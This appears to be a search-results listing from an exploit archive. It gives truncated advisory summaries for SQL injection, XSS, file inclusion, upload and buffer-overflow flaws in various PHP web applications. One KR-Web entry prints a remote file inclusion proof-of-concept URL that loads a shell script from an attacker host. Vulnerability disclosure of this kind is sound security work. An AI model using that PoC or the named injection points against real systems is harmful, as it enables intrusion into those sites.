92 matches found
work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability
Rodrigo Duarte WuefezAT2die4.com ;D WORK system e-commerce: WORK PHP, Mysql content management system CMS e-commerce or not: ajax, workflow, content, package, language, currency, country, price, stock, group user, CSS, banner, logo,...
SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability
Source: http://www.securityfocus.com/bid/2492/info A buffer overflow in ASPSeek versions 1.0.0 through to 1.0.3 allows for arbitrary code execution with the privileges of the web server. The vulnerable script is s.cgi and the buffer overflow can be accessed by...
OSSIM 2.1 - SQL Injection and xss
OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3. Unauthorized access. Digital Security Research Group DSecRG Advisory DSECRG-09-055 Application: OSSIM Versions Affected: 2.1...
TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities
TikiWiki <= 1.9.8.1 Local File Inclusion. Author: L4teral l4teral 4t gmail com Impact: Local File Inclusion Status: patch...
SEC Consult 20130417-0 :: Multiple vulnerabilities in Sosci Survey
SEC Consult Vulnerability Lab Security Advisory 20130417-0 title: Multiple vulnerabilities in Sosci Survey product: Sosci Survey vulnerable version: 2.3.04a fixed version: 2.3.04a impact: Critical homepage:...
Multiple Vulnerabilities in phpGraphy
High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in phpGraphy which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerability in phpGraphy The vulnerability exists due to input sanitation error in th...
Keynect eCommerce - SQL Injection
Title: SQL Injection Keynect Ecommerce | Author: Arturo Zamora | email: [email protected] | Date: 10/03/2011 | Verified: yes | Risk: High |...
www.eVuln.com : HTTP Response Splitting in Social Share
www.eVuln.com advisory: HTTP Response Splitting in Social Share Summary: http://evuln.com/vulns/168/summary.html Details: http://evuln.com/vulns/168/description.html -----------Summary----------- eVuln ID: EV0168 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: HTT...
[eVuln.com] Multiple XSS in Alguest
New eVuln Advisory: Multiple XSS in Alguest Summary: http://evuln.com/vulns/151/summary.html Details: http://evuln.com/vulns/151/description.html -----------Summary----------- eVuln ID: EV0151 Software: Alguest Vendor: n/a Version: 1.1c-patched Critical Level: low Type: Cross Site Scripting Statu...
Multiple Vulnerabilities in BEdita
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BEdita which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerability in BEdita The vulnerability exists due to input sanitation error in...
Multiple Vulnerabilities in Zomplog
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Zomplog which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerabilities in Zomplog 1.1 The vulnerability exists due to input sanitation...
Elite Gaming Ladders v3.5 SQL Injection Vulnerability
Exploit for php platform in category web applications. Elite Gaming Ladders v3.5 SQL Injection Vulnerability. Date: 2010-06-19...
Cross-site Scripting (XSS) Vulnerabilities in Scribe CMS
High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in Scribe CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerability in Scribe CMS 1.1 The vulnerability exists due to input sanitation error in the “f” parameter in...
Alibaba Clone Platinum - '/buyer/index.php' SQL Injection
Title: Alibaba Clone Platinum buyer/index.php SQL Injection Vulnerability Author: GuN Published: 2010-14-05 Verified: yes ...
post Card ( catid ) Remote SQL Injection Vulnerability
Exploit for php platform in category web applications. post Card catid Remote SQL Injection Vulnerability. Author: Hussin X Home :...
UGiA PHP UPLOADER 0.2 - Arbitrary File Upload
Title: UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability | Author: indoushka | email: [email protected] | Home: www.iq-ty.com/vb | Script Home :...
phpMDJ 1.0.3 - SQL Injection
Vulnerable Script: phpMDJ 1.0.3 Download: http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip Vulnerability: Remote SQL Injection...
ArticleLive 1.7.1.2 - 'blogs.php?Id' SQL Injection
Author : Baybora Product : ArticleLive Interspire Website Publisher Version : NX.1.7.1.2 and possibly earlier versions Download : http://www.interspire.com/ Price : $ 249 Site : www.1923turk.biz Vulnerable script: blogs.php?Id = SQL-injection...
KR-Web 1.1b2 Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://0wn3d.com/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, and everyone who hates me and loves me I Love U Full : /\ all member at...
OSSIM 2.1 SQL Injection and xss
Exploit for unknown platform in category web applications. OSSIM 2.1 SQL Injection and xss. OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3...